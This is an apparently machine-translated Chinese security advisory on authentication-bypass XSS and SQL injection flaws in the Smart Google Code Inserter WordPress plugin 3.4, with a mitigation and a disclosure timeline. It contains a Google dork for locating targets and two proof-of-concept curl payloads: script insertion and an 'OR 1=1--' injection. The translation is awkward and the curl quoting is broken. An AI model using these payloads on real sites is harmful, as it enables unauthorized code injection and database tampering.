WordPress智能Google代码插入器插件CVE-2018-3810身份验证绕过SQL注入漏洞

描述

通过此插件,您可以轻松添加Google Analytics跟踪代码以及网站站长工具的元标记验证。新增功能 – 现在您可以添加Google AdWords转换跟踪代码,并从下拉列表中选择一个页面列表,以选择要将代码放置在哪个页面上(例如,感谢页面)。
Google Dork:inurl:wp-content / plugins / smart-google-code-inserter /
日期:26-Nov-17
漏洞利用作者:Benjamin Lim
供应商主页:http : //oturia.com/
软件链接:https:// wordpress .org / plugins / smart-google-code-inserter /
版本:3.4
测试:Kali Linux 2.0
CVE:CVE-2018-3810(带有结果XSS的身份验证绕过)
CVE:CVE-2018-3811(SQL注入)
1.产品和服务简介:
==================================
智能谷歌代码插入是一个WordPress插件可轻松添加
Google Analytics(分析)跟踪代码以及
网站站长工具的元标记验证。截至目前,该插件已被下载34,207次,并
有9000多个主动安装。
2.技术细节和说明:
===================================
智能Google代码中的身份验证绕过漏洞插入
插件3.4允许未经认证的攻击者插入任意JavaScript
运行在由WordPress服务的所有网页或HTML代码。的
在smartgooglecode.php saveGoogleCode()函数不检查
当前请求由授权用户进行,因此允许任何
未认证用户成功更新插入的代码。
SQL注入漏洞与智能Google代码插入器插件3.4中的身份验证绕过漏洞相结合,允许未经身份验证的攻击者在
Web服务器上下文中执行SQL查询。smartgooglecode.php中的saveGoogleAdWords()函数不使用预处理语句,并且在将$ _POST [“oId”]变量作为输入传递给SQL查询之前不会对其进行清理。
 

3. POC
==========================
 
Code Insertion
 
curl -k -i --raw -X POST -d
"sgcgoogleanalytic=<script>alert("1");</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode"
localhost" -H "Content-Type: application/x-www-form-urlencoded"
 
SQL Injection
 
curl -k -i --raw -X POST -d "action=saveadwords&delconf=1&oId[]=1 OR
1=1--&ppccap[]=ex:mywplead&ppcpageid[]=1&ppccode[]=bb&nchkdel1=on" "
localhost" -H "Content-Type: application/x-www-form-urlencoded"
 
4. Mitigation
=============
Update to version 3.5
 
5. Disclosure Timeline
======================
2017/11/29 Vendor contacted
2017/11/30 Vendor acknowleged and released an update
2018/01/01 Advisory released to the public
 
6. Credits & Authors:
=====================
Benjamin Lim - [https://limbenjamin.com]

Leave a Reply